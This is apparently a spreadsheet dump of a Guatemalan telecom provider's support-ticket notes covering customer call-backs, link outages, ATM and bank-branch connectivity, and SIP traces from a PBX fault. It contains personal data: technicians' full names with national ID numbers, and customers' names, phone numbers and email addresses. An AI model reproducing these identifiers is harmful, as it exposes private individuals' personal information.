CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE PERMISOS || SERVICIO TECNICO DE MANTENIMIENTO DE AVIACION S.A. || F4584751
BUENA TARDE
SOLICITAMOS PUEDA GESTIONARSE EL ACCESO A PERSONAL TÉCNICO DE CLARO PARA EL INGRESO A SUS INSTALACIONES PARA REALIZAR LAS REPARACIONES NECESARIAS.
NOMBRE - IBM - DPI
MARLON ENRIQUE MUÑOZ ORELLANA - 652515 - 1582 46500 1801
JOSÉ ALBERTO IXPATA TOJ - 608559 - 1660 02313 1503
JUAN JOSE RODRIGUEZ PAZ - 217826 - 2494 43260 0208
JAVIER DANILO CHETE CHAJON - 532967 - 2149 40594 0103
LUIS EMILIO GONZALEZ CATALAN - 589636 - 2530 48877 0101
PEDRO EDUARDO TOT MARTINEZ - 739764 - 1681 34810 0101
MILTON ENRIQUE SALAZAR PÉREZ - 725586 - 2626 48784 0101
EDGAR DANIEL GOMEZ MENDEZ - 589058 - 1628 97243 1401
JUAN ALBERTO TRUJILLO ORTIZ - 732334 - 2487 19076 0115
DANIEL ENRIQUE MONTENEGRO CARACUN - 659473 - 2414 54425 0101
ERWIN EDUARDO DEL CID DUBON - 52522 - 1981 48798 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SHILA RAMIREZ 30895280 QUIEN CONFIRMA SON 6 MBPS CONTRATADOS
SE LE INDICA QUE A NIVEL DE CLARO TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 30016754910</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SHILA RAMIREZ 30895280 MENCIONA QUE VALIDARA CON SU IT CUANDO INCREMENTARON EL ANCHO DE BANDA PORQUE TENIA ENTENDIDO QUE SON 7MBPS
SE LE MENCIONA QUE DE LADO DE CLARO TODO EL SERVICIO ESTA OPERATIVO Y ESTABLE
CLIENTE SOLICITA LLAMADA PARA LAS 14:20
-ID 3001638743</t>
  </si>
  <si>
    <t>F4584752</t>
  </si>
  <si>
    <t>SE LLAMA A LAURA MELIZA LÓPEZ 34042338 NO RESPONDE, SE INTENTARA LUEGO
ID 3001604840</t>
  </si>
  <si>
    <t>F4584760</t>
  </si>
  <si>
    <t>F4584763</t>
  </si>
  <si>
    <t>F4584767</t>
  </si>
  <si>
    <t>INFORMA ORLANDO RAMIREZ ENLACE UP
SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;
BUENA TARDE SE REVISA ENLACE Y ATM SE VEN ESTABLES
SERVICIOS 5B
PBX: (502) 2420-7200</t>
  </si>
  <si>
    <t>SE NOTIFICA A CLIENTE ALARMA EN EL MONITOREO PROACTIVO PARA ENLACE PRINCIPAL, OPERATIVO POR 3G,
KENNY ROBERT RIVERA JUAREZ
ESTIMADO CLIENTE,
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ACTUALMENTE ENLACE SE ENCUENTRA FUNCIONANDO ÚNICAMENTE POR REDUNDANTE 3G, POR LO QUE SE SOLICITA SE VALIDE ENLACE PRINCIPAL.
TICKET: F4584767
ID: 47500980T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM0474
UBICADO EN: ATM 474, AG. BANRURAL SAN RAYMUNDO, 4 AVENIDA Y 5 CALLE ZONA 1, SAN RAYMUNDO
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>INFORMA ORLANDO DE 5B QUE NO HAY ENERGIA ELECTRICA EN EL LUGAR
SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;
BUENA TARDE  INFORMANDO QUE NO HAY E.E EN EL SECTOR.
ORLANDO RAMIREZ
SERVICIOS 5B
PBX: (502) 2420-7200</t>
  </si>
  <si>
    <t>SE RECIBE CORREO INDICANDO REVISION POR PARTE DE 5B
SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;
ESTIMAD@ KENNY.RIVERA, SU SOLICITUD  756869 HA SIDO ASIGNADA A ORLANDO RAMIREZ.</t>
  </si>
  <si>
    <t>F4584768</t>
  </si>
  <si>
    <t>F4584769</t>
  </si>
  <si>
    <t xml:space="preserve">
SE LLAMA A LAURA MELIZA LÓPEZ 34042338 MENCIONA QUE CLIENTE YA NO ESTA LABORANDO POR LO QUE SOLICITA LLAMADA PARA MAÑANA A PARTIR DE LAS 8:30
-ID 3001433791</t>
  </si>
  <si>
    <t>F4584774</t>
  </si>
  <si>
    <t xml:space="preserve">
SE LLAMA A  LAURA MELIZA LÓPEZ  34042338 SIGUE SIN RESPONDER
-ID 3001624977 - 3001625301</t>
  </si>
  <si>
    <t>F4584777</t>
  </si>
  <si>
    <t>F4584780</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE A LAURA MELIZA LÓPEZ CHACÓN AL 34042338 INDICA QUE YA CERRARON QUE NO PUEDE CONFIRMAR QUE SE LE LLAME MAÑANA DE 8:00 A 8:30 AM **
ID 3001413828
**</t>
  </si>
  <si>
    <t>F4584783</t>
  </si>
  <si>
    <t>EJECUTIVA LAURA LÓPEZ 34042338 SOLICITA QUE SE CONTINUA CON SEGUIMIENTO MAÑANA 8:30 AM, SE NECESITAN DATOS DEL PUNTO REMOTO.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. LAURA MELIZA LÓPEZ CHACÓN 34042338 NO CONTESTO IVR ENVIA A BUZON, ID: 3001418091.</t>
  </si>
  <si>
    <t>SE LLAMA NUEVAMENTE A LAURA PARA SEGUIMIENTO DEL CASO SIN EMBARGO NO RESPONDE
34042338</t>
  </si>
  <si>
    <t>SE LLAMA A LAURA MELIZA LÓPEZ 34042338 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001609499</t>
  </si>
  <si>
    <t>F4584786</t>
  </si>
  <si>
    <t>SE LLAMA A  LAURA MELIZA LÓPEZ 34042338 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001618489</t>
  </si>
  <si>
    <t>F4584792</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE A LOS NUMEROS BRINDADOS SIN EMBARGO NO RESPONDE---&gt;&gt;
24400113 33406952</t>
  </si>
  <si>
    <t>SE INTENTO LLAMAR A CLIENTE PARA VALIDAR SERVICIO PERO NO COMPLETA LLAMADA, UNICAMENTE CORTA AL MARCAR--</t>
  </si>
  <si>
    <t>SE LLAMA NUEVAMENTE A CLIENTE PARA SEGUIMIENTO DEL CASO SIN EMBARGO NO RESPONDE---</t>
  </si>
  <si>
    <t>SE LLAMA NUEVAMENTE A CLIENTE PARA REALIZAR PRUEBAS SIN EMBARGO NO RESPONDE---
PRIMER NUMERO SUENA OCUPADO
SEGUNDO NUMERO 33406952 ENVIA  A BUZON--</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
INVERSIONES ESMERALDA 1318239OH</t>
  </si>
  <si>
    <t>GLADYS INDICA QUE SE LLAME NUEVAMENTE A LAS 2:30 APROXIMADAMENTE, YA QUE PERSONA QUE APOYARIA REALIZANDO PRUEBAS SE ENCUENTRA FUERA--&gt;&gt;
&gt;&gt;&gt; CL COMENTA INCONVENIENTE DE BW
&gt;&gt; ES NECESARIO CONECTARSE UNA PC A ROUTER Y DESCONECTAR LA LAN..-
&gt;&gt; AL PARECER UNICAMENTE DOS EQUIPOS SE CONECTAN DIRECTO AL ROUTER QUE SON SERVIDORES Y LOS DEMAS VAN POR WIFI-</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PARA SEGUIMIENTO DEL CASO PERO NO RESPONDE--
33406952</t>
  </si>
  <si>
    <t>SE REALIZO MODIFICACIONES DE NEGOCIACIONES QUEDA EN FORZADO.,.----
CLIENTE INDICA QUE VERA COMPORTAMIENTO DEL SERVICIO SOLICITA LLAMADA A LAS 11:30 AM_</t>
  </si>
  <si>
    <t>F4584796</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84796
ID:  42700354T
IDENTIFICADOR DEL CLIENTE:  CC_BANTRAB_GT_AGENCIA_130
UBICADO EN:  CALLE REAL ZONA 4 TACANA SAN MARCOS
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>CLIENTE CONFIRMA QUE YA LO OBSERVA OPERATIVO, INDICA QUE POR MAL CLIMA EN EL SITIO ESTA AFECTADO POR FLUCTUACIONES ELECTRICAS, SE DEJARA EN OBSERVACION HASTA LAS 18 HORAS
JOSUE D. PEREZ (ANALISTA I DE MONITOREO) &lt;JOSUE_PEREZ@BANTRAB.COM&gt;
BUENAS TARDES ESTIMADOS,
POR ESTE MEDIO LES COMENTO QUE YA SE OBSERVA OPERATIVA LA INTERFAZ LA CUAL SE HA DE VER DEBIDO POR CORTE DE LUZ, YA QUE EL CLIMA AFECTA LOS CENTROS DE NEGOCIOS, MUY AMABLES POR EL SEGUIMIENTO.
SALUDOS CORDIALES
JOSUE D. PEREZ
ANALISTA I DE MONITOREO
                ¿
PBX: 1755 EXT. 60009
AVENIDA REFORMA 6-20 ZONA 9
EDIFICIO BANTRAB CENTRAL (TORRE I), NIVEL 8
CIUDAD DE GUATEMALA, GUATEMALA
WWW.BANTRAB.COM.GT</t>
  </si>
  <si>
    <t>F4584799</t>
  </si>
  <si>
    <t>SE ENVIO EL SIGUIENTE CORREO AL CLIENTE.
BUENAS TARDES,
ESTIMADOS SE LES INFORMA QUE SE REVISISARON LOS E1 SIGUIENTES DONDE SE VERIFICA QUE SOLO HAY UNO CAIDO. Y TODOS LOS DEMAS SE ENCUENTRAN ACTIVOS.</t>
  </si>
  <si>
    <t>SE ENVIO EL SIGUIENTE CORREO AL CLIENTE.
BUENAS TARDES ESTIMADOS,
SE NECESITA INFORMACIÓN DE CUANDO SE PUEDE REALIZAR LA VISITA TÉCNICA. YA QUE PARA HACER MEDICIONES HAY QUE DESCONECTAR LOS E1 Y PROCEDER CON LA IDENTIFICACIÓN DE CADA UNO.
Y SI SON NECESARIOS LOS PERMISOS DE ACCESO A SUS INSTALACIONES.
QUEDO A LA ESPERA DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE EVELYN FLORES PERO NO CONTESTA. ES NECESARIO SABER QUE ESTA REPORTANDO.
3001394582, 3001395034, 3001395110
COLA:
NOMBRE: A: 0050433287157
NÚMERO: 0050433287157
DURACIÓN: 0:00:34
ESTADO: MARCANDO
DETALLES: 0050433287157
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 31/05/2022 14:19:47</t>
  </si>
  <si>
    <t>F4584801</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ARMERY GONZALEZ AL 89204149 INDICA QUE SIGUE EL INCONVENIENTE QUE YA REINICIO LOS EQUIPOS Y NO LEVANTA || SE NOTIFICA A GESTOR **
ID 3001416744
**</t>
  </si>
  <si>
    <t>F4584809</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARCO GIL AL 31408318  - 24993900 CONTESTA EL SEÑOR MARIANO VASQUEZ CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 3001420663
**</t>
  </si>
  <si>
    <t>F4584811</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE BRANDON ALBERTO MONROY 51049936
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE UNICAMENTE DEJARON CONECTADA LA FO QUE NO TIENE UN EQUIPO DE MARCA CTC EN LAS INSTALACIONES, SE LE INDICA AL CLIENTE QUE UBIQUE LOS EQUIPOS EN EL RACK O ALGUNA OFICINA PERO CLIENTE SE NIEGA, COMENTA QUE NECESITA QUE LE RESTABLEZCAN EL SERVICIO, SE LE INDICA QUE S EOBSERVA ALARMA DE FO Y QUE SE ENVIARA PERSONAL A VERIFICAR SI NO HAY ALGUN DAÑO O CORTE, CLIENTE INDICA QUE NO ES NECESARIO TRAMTIAR PERMISOS UNICAMENTE QUE SE LE NOTIFIQUE CUANDO ESTEN LLEGANDO, SE CONFIRMA DIRECCION Y NIVEL EN EL EDIFICIO, ADICIONAL INDICA QUE SE RETIRA A LAS 16:00 HRS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4584827</t>
  </si>
  <si>
    <t>SE LLAMA A LAURA MELIZA LÓPEZ 34042338 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001424082</t>
  </si>
  <si>
    <t>F4584828</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN CARLOS LOPEZ 22098142 MENCIONA QUE EL INCONVENIENTE ES INTERNO
CLIENTE CONFIRMA QUE SI LOGRA LLEGARLE A LOS EQUIPOS DE PR
-ID 3001453284</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN CARLOS LOPEZ 22098142 MENCIONA QUE ENVIARAN A PERSONAL INTERNO A VALIDAR LAS CONEXIONES POR LO QUE SOLICITA LLAMADA A LAS 16:30
-ID 3001413335</t>
  </si>
  <si>
    <t>F4584840</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LAURA MELIZA LÓPEZ  AL 34042338  NO RESPONDE ENVIA A BUZON ||
SE INTENTARA LUEGO **
ID 3001603805
**</t>
  </si>
  <si>
    <t>F4584842</t>
  </si>
  <si>
    <t>F4584846</t>
  </si>
  <si>
    <t>F4584847</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 23650658 - 49034309 MENCIONA QUE NO TENIAN ENERGIA EN PR
CLIENTE CONFIRMA EL FUNCIONAMIENTO
-ID 3001425472 - 3001425717</t>
  </si>
  <si>
    <t>F4584848</t>
  </si>
  <si>
    <t>OMAR CABRERA-55583124  INDICA  QUE EL PROBLEMA ES INTERMITENTE, MAÑANA NUEVAMENTE SE REALIZARAN PRUEBAS ##NOSE HA DETECTADO LO QUE REPORTA EL CLIENTE EN ESTAS HORAS ## SEGUIMIENTO MAÑANA ##9 AM ##</t>
  </si>
  <si>
    <t>SE LLAMAM A CLIENTE OMAR CABRERA-55583124 - SE TIENE EN LINEA ##
3001614993
COLA:
NOMBRE: A: 55583124
NÚMERO: 55583124
DURACIÓN: 0:00:10
ESTADO: CONECTADA
DETALLES: 55583124
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 1/06/2022 11:41:01</t>
  </si>
  <si>
    <t>SE PROCEDE A DOCUMENTAR TICKET ##SE HABLO CON PROVEEDOR DE PBX + CLIENTE ## PROVEEDOR REVISARA TICKET#</t>
  </si>
  <si>
    <t>SE REALIZAN PRUEBAS CON  SEÑORITA  LORENA 56155679, AL MOMENTO DE SACAR UNA LLAMADA NO SE OBSERVA EN TRAZA Y PERO SU MISMA PBX LE DICE QUE NO TIENE PERMITIDO REALIZAR LLAMADAS + SE REALIZA TRAZA EN LLAMADA ENTRANTE Y SE OBSERVA QUE SE ESTA LIBERANDO CON CAUSA "
REASON: Q.850;CAUSE=19;TEXT="USER ALERTING, NO ANSWER"
L2: U 01/06/2022 11:10:21:380 ISDN-PRI1: PRIMITIVE FROM IWF TO NT = CONN_REQ CALL_ID=0
L2: U 01/06/2022 11:10:24:680 ISDN-PRI1: PRIMITIVE FROM IWF TO NT = DISC_RES CALL_ID=0
L1: U 01/06/2022 11:10:24:700 VOIP:
&gt;&gt;&gt; SIP TX TO 10.16.246.231:5060:
SIP/2.0 480 TEMPORARILY UNAVAILABLE
VIA: SIP/2.0/UDP 10.16.246.231:5060;BRANCH=Z9HG4BKE9WGCT98WWH8TWTWWOXGTCDGHT19880;RECEIVED=10.16.246.231
FROM: &lt;SIP:25095000@IMSHWI.CLARO.COM.GT;USER=PHONE&gt;;TAG=SBC0403H3J3RX2L-CC-16
TO: &lt;SIP:+50222254800@10.16.246.231:5060;TRANSPORT=UDP;USER=PHONE&gt;;TAG=AS38830FAF
CALL-ID: ASBCIGRRJX0VX8VV80HG0L12RRR1302GJA2G@ATS.CEATS1.IMSHWI.CLARO.COM.GT.16
CSEQ: 1 INVITE
SERVER: AETHRA TELECOMMUNICATIONS PBX
ALLOW: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO, UPDATE, PRACK
CONTENT-LENGTH: 0
REASON: Q.850;CAUSE=19;TEXT="USER ALERTING, NO ANSWER"
&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;}
CC_INVERSIONES_CABMEN_S_A\VOIP&gt;
L2: U 01/06/2022 11:08:00:680 ISDN-PRI1: PRIMITIVE FROM IWF TO NT = DISC_RES CALL_ID=0
L1: U 01/06/2022 11:08:00:700 VOIP:
&gt;&gt;&gt; SIP TX TO 10.16.246.231:5060:
SIP/2.0 480 TEMPORARILY UNAVAILABLE
VIA: SIP/2.0/UDP 10.16.246.231:5060;BRANCH=Z9HG4BK7LODOCEAAXYAXHHLGCLA8GLDHT17783;RECEIVED=10.16.246.231
FROM: &lt;SIP:25095000@IMSHWI.CLARO.COM.GT;USER=PHONE&gt;;TAG=SBC0402P3X1XIX2-CC-16
TO: &lt;SIP:+50222254800@10.16.246.231:5060;TRANSPORT=UDP;USER=PHONE&gt;;TAG=AS71464379
CALL-ID: ASBC1H0P3ZZ0XP0LZ1II0AP0RX2AXJHL181Z@ATS.CEATS1.IMSHWI.CLARO.COM.GT.16
CSEQ: 1 INVITE
SERVER: AETHRA TELECOMMUNICATIONS PBX
ALLOW: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO, UPDATE, PRACK
CONTENT-LENGTH: 0
REASON: Q.850;CAUSE=19;TEXT="USER ALERTING, NO ANSWER"
&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;
3001602563
COLA:
NOMBRE: A: 56155679
NÚMERO: 56155679
DURACIÓN: 0:03:23
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 56155679
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 1/06/2022 11:11:23</t>
  </si>
  <si>
    <t>SE ENVIA PRUEBAS A CLIENTE VIA CORREO ##SE PROCEDE AL CIERRE ##  A NIVEL DE CLARO TODO OK ##
DE: MARIA ISABEL GODINEZ SAENZ
ENVIADO: MIÉRCOLES, 1 DE JUNIO DE 2022 12:18
PARA: O.CABRERA@GLOMEDIC.COM.GT &lt;O.CABRERA@GLOMEDIC.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;; INFO@GLOMEDIC.COM.GT &lt;INFO@GLOMEDIC.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: GDN: 22254800 || INVERSIONES CABMEN, S.A. 23 CALLE 14-58 ZONA 4 DE MIXCO CONDADO NARANJO
BUEN DÍA ESTIMADO, CON RESPECTO AL E1:
GDN:  22254800
INVERSIONES CABMEN, S.A.
23 CALLE 14-58 ZONA 4 DE MIXCO CONDADO NARANJO EDIFICIO CRECE TORRE 1 NIVEL 1 DISTRILOCAL 2 MIXCO GU
SEGÚN REPORTE:  DE MANERA ESPORÁDICA HAY UN MOMENTO DONDE NO POSEE LLAMADAS ENTRANTES Y SALIENTES. SE REALIZARON VARIAS PRUEBAS Y SE VERIFICA CON APOYO DE TRAZAS EN EL MOMENTO DONDE SUCEDE ESTE INCONVENIENTE CON APOYO DE SRITA LORENA QUE:
EN LLAMADAS SALIENTES:
AL MOMENTO DE PRESIONAR EL BOTÓN DE ESCAPE, LE APARECE EN PANTALLA:  "NO TIENE ACCESO PARA REALIZAR UNA LLAMADA" Y NO HAY TONO PARA PODER MARCAR LOS 8 DÍGITOS. POR ENDE SE OBSERVA EN LAS  TRAZAS QUE PBX NO SACA LLAMADA.
EN LLAMADAS ENTRANTES:
SE OBSERVA QUE AL REALIZAR UNA LLAMADA ENTRANTE LA PBX LIBERA LA LLAMADA CON CAUSA: CAUSE=19;TEXT="USER ALERTING, NO ANSWER".
POR LO QUE RECOMENDAMOS ESCALAR CASO A SU PROVEEDOR DE PBX PARA QUE PUEDA VERIFICAR EL INCONVENIENTE REPORTADO, A NIVEL DE CLARO TODO OK. FAVOR ESCALAR CON SU PROVEEDOR.
NOTA:
ADJUNTAMOS TRAZA DONDE SE OBSERVA LA LIBERACIÓN POR PARTE DE LA PBX
&gt;&gt;&gt; SIP TX TO 10.16.246.231:5060:
SIP/2.0 480 TEMPORARILY UNAVAILABLE
VIA: SIP/2.0/UDP
FROM: &lt;SIP:25095000@IMSHWI.CLARO.COM.GT;USER=PHONE&gt;;TAG=SBC0403H3J3RX2L-CC-16 -----  NÚMERO DE ORIGEN
TO: &lt;SIP:+50222254800@10.16.246.231:5060;TRANSPORT=UDP;USER=PHONE&gt;;TAG=AS38830FAF -----  NÚMERO DESTINO
CALL-ID: ASBCIGRRJX0VX8VV80HG0L12RRR1302GJA2G@ATS.CEATS1.IMSHWI.CLARO.COM.GT.16
CSEQ: 1 INVITE
SERVER: AETHRA TELECOMMUNICATIONS PBX
ALLOW: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO, UPDATE, PRACK
CONTENT-LENGTH: 0
REASON: Q.850;CAUSE=19;TEXT="USER ALERTING, NO ANSWER"   ----- ACA SE OBSERVA LA LIBERACIÓN POR PARTE DE PBX
&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;
POR LO QUE PROCEDEMOS AL CIERRE DEL TICKET PARA QUE ESCALE A SU PROVEEDOR,
SALUDOS,
 ¯¿"*°¿¿°*"¿¯`¿¯¿"*°¿¿°*"¿¯`
¡TE CUIDAS TÚ, NOS CUIDAMOS TODOS! &amp;#xd83d;&amp;#xde37;</t>
  </si>
  <si>
    <t>SE LLAMA AL GDN 22254800 CONTESTA SERÑORITA  CLIENTE  ROSAMARIA MENDIA DE CABRERA  ##COMENTA QUE DESDE ULTIMA LLAMADA NO HA TENIDO NINGUN TIPO DE PROBLEMA "" ## VIVO</t>
  </si>
  <si>
    <t>F4584849</t>
  </si>
  <si>
    <t>F4584851</t>
  </si>
  <si>
    <t>F4584854</t>
  </si>
  <si>
    <t>SE CONVERSO CON CLIENTE ULISES HERNANDEZ, SOLICITA MONITOREO POR 24 HORAS E INDICA QUE LLAMARA SI SE TIENE AFECTACION, PARA DESCARTAR SATURACION DEL ENLACE
NÚMERO: 0050376019142
FIN: HOY, 15:58
ID DE LLAMADA: 3001694448</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ULISES HERNANDEZ 75841401 - 76019142 NO RESPONDE || SE INTENTARA LUEGO Y SE SOLICITA VIA SKYPE A GESTOR ACTUALIZACION DE TICKET **
-ID 1001087171 - 1001087450
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ULISES HERNANDEZ 75841401 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 3001947242</t>
  </si>
  <si>
    <t>F4584855</t>
  </si>
  <si>
    <t>F4584856</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ULISES HERNANDEZ AL 75841401  INDICA QUE POR EL MOMENTO ESTA INESTABLE PERO POR MOMENTOS ES LA INESTABILIDAD|| SE NOTIFICA A GESTOR **
ID 3001450034
**</t>
  </si>
  <si>
    <t>F4584859</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE GOLDA NUBIA, INDICA QUE ESTUVIERO TODA LA MAÑANA INTENTADO LEVANTAR EL SERVICIO, REVISANDO CONEXIONES Y ENERGIA PERO NO FUE POSIBLE LEVANTAR EL SERVICIO Y FUE LA RAZON POR LA QUE SE REALIZO EL REPORTE, SE PROCEDEA A COORDIANAR VISITA, CLIENTE INDICA QUE LA VISITA SE PROGRAME PARA EL DIA DE MAÑANA.  Y CONFIRMA DATOS.
UBICACION: BARRIO EL CENTRO MASUGURA, ANTIBUCA, CASA LA CULTURA, FRENTE AL PARQUE CENTRAL
HORARIO DE ATENCION:  8 A 16: 00 MAÑA
PERMISOS: NO
CONTACTO EN SITIO: GOLDA NUBIA 99928137
3001425302
COLA:
NOMBRE: A: 0050499928137
NÚMERO: 0050499928137
DURACIÓN: 0:03:41
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 0050499928137
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 31/05/2022 16:01:39</t>
  </si>
  <si>
    <t>F4584861</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MEDARDO FLORES AL 45291302 NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO**
ID 3001423854
**</t>
  </si>
  <si>
    <t>F4584867</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARCO ALEMAN 78708831 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001427084</t>
  </si>
  <si>
    <t>F4584870</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MAURICIO PEÑA AL 77493031  SOLICITA QUE SE LE ENVIE CORREO CON PRUEBAS PARA QUE PUEDA CONFIRMAR **
ID 3001425136
**</t>
  </si>
  <si>
    <t>F4584893</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RUFINO INTERIANO AL  75367532 INDICA QUE AUN NO TIENE SERVICIO || SE NOTIFICA A GESTOR **
ID 3001431604
**</t>
  </si>
  <si>
    <t>F4584896</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MERCEDES ESTRADA AL 60526528 INDICA QUE AUN ESTA SIN SERVICIO || SE NOTIFICA A GESTOR **
ID 3001434162
**</t>
  </si>
  <si>
    <t>F4584901</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ANABELLA 78257152 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001429197</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ANABELLA 78257152 NO RESPONDE, ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 3001443532
**</t>
  </si>
  <si>
    <t>F4584944</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE DORCAS QUIEN INDICA QUE LOS PERMISOS DE ACCESO NO SON NECESARIOS. Y QUE SE PUEDE REALIZAR LA VISITA EL DIA DE MAÑANA A LAS 8:00AM.
3001495052
COLA:
NOMBRE: A: 48654090
NÚMERO: 011 50248654090
DURACIÓN: 0:01:04
ESTADO: CONECTADA
DETALLES: +50248654090
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 31/05/2022 18:21:36</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DORCAS GUARCHAJ 48654090 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001710887</t>
  </si>
  <si>
    <t>F4584947</t>
  </si>
  <si>
    <t>--- RONY GUANDALINI 54598944 (CLIENTE), INDICA QUE EL INCONVENIENTE LO TIENEN CON EL INTERNET, SE UBICA EL IDENTIFICADOR 758500006 Y SE GENERA SD1130915//F4585080, SE NOTIFICA, AUTORIZA EL CIERRE DE ESTE CASO.---
RESULTADO: CONTESTADA
NOMBRE: 54598944
NÚMERO: 54598944
INICIO: HOY, 17:29
FIN: HOY, 17:36
DURACIÓN: 7:20
ID DE LLAMADA: 3001465594
...</t>
  </si>
  <si>
    <t>F4584973</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE, ANTONIO PUAC-41033125 SE LE COMENTA QUE SU SERVICIO ESTA SIENDO AFECTADO POR DOBLE AFECTACION.
1- A NIVEL DE UM
2. A NIVEL REGIONAL TELLABS
CLIENTE QUEDA ENTERADO + SE LE COMENTA QUE DE MANERA PROACTIVA SE ESTA TRABAJANDO ##VIVO</t>
  </si>
  <si>
    <t>SE HABLA CON CLIENTE ANTONIO PUAC-41033125  - EN CLIENTE ESTADO DE LUCES LUEGO DE UN REINICIO PERMANECEN:
PWR ROJO
LA ROJO</t>
  </si>
  <si>
    <t>F4584975</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE ANDRES SIAM  PERO NO CONTESTA. POSIBLEMENTE EL CLIENTE YA SE RETIRO. SE DARA SEGUIMIENTO EL DIA DE MAÑANA EN HORARIO HABIL.
3001485026, 3001485938, 3001486370
COLA:
NOMBRE: A: 55280199
NÚMERO: 55280199
DURACIÓN: 0:00:01
ESTADO: MARCANDO
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 31/05/2022 18:14:00
COLA:
NOMBRE: A: 59182269
NÚMERO: 59182269
DURACIÓN: 0:00:23
ESTADO: MARCANDO
DETALLES: 59182269
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 31/05/2022 18:13:39</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANDRES SIAN 59182269 ## VIVO ## SE HAN MARCADO 3 VECES ##ENVIA A BUZON ##SE INTENTARA NUEVAMENTE EN BREVE ##</t>
